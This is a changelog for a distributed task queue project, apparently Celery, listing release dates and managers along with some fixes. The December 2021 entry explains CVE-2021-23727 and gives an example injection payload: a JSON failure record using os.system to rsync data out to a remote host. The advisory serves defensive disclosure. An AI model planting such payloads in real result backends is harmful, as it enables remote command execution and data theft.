Distributed Task Queue (development branch)
Release date: 2023-02-19 1:47 P.M GMT+2
Release by: Asif Saif Uddin
Release date: 2022-08-01 5:15 P.M UTC+6:00
Release by: Asif Saif Uddin
Release date: 2022-06-29 5:15 P.M UTC+6:00
Release by: Asif Saif Uddin
Release date: 2022-5-26 12:15 P.M UTC+2:00
Release by: Omer Katz
Release date: 2022-4-04 21:15 P.M UTC+2:00
Release by: Omer Katz
load_extension_class_names - correct module_name (#7433).
: This fixes a regression caused by #7218.
Release date: 2022-4-03 20:42 P.M UTC+2:00
Release by: Omer Katz
This release was yanked due to a regression caused by the PR below
Release date: 2022-4-03 20:30 P.M UTC+2:00
Release by: Omer Katz
Release date: 2021-12-29 12:00 P.M UTC+6:00
Release by: Asif Saif Uddin
Release date: 2021-12-26 16:30 P.M UTC+2:00
Release by: Omer Katz
Various documentation fixes.
Fix CVE-2021-23727 (Stored Command Injection security vulnerability).
When a task fails, the failure information is serialized in the backend. In some cases, the exception class is only importable from the consumer's code base. In this case, we reconstruct the exception class so that we can re-raise the error on the process which queried the task's result. This was introduced in #4836. If the recreated exception type isn't an exception, this is a security issue. Without the condition included in this patch, an attacker could inject a remote code execution instruction such as:
os.system("rsync /data [email protected]:~/data")
by setting the task's result to a failure in the result backend with the os, the system function as the exception type and the payloadrsync /data [email protected]:~/data
as the exception arguments like so:{ "exc_module": "os", 'exc_type': "system", "exc_message": "rsync /data [email protected]:~/data" }
According to my analysis, this vulnerability can only be exploited if the producer delayed a task which runs long enough for the attacker to change the result mid-flight, and the producer has polled for the task's result. The attacker would also have to gain access to the result backend. The severity of this security vulnerability is low, but we still recommend upgrading.
Release date: 2021-11-16 8.55 P.M UTC+6:00
Release by: Asif Saif Uddin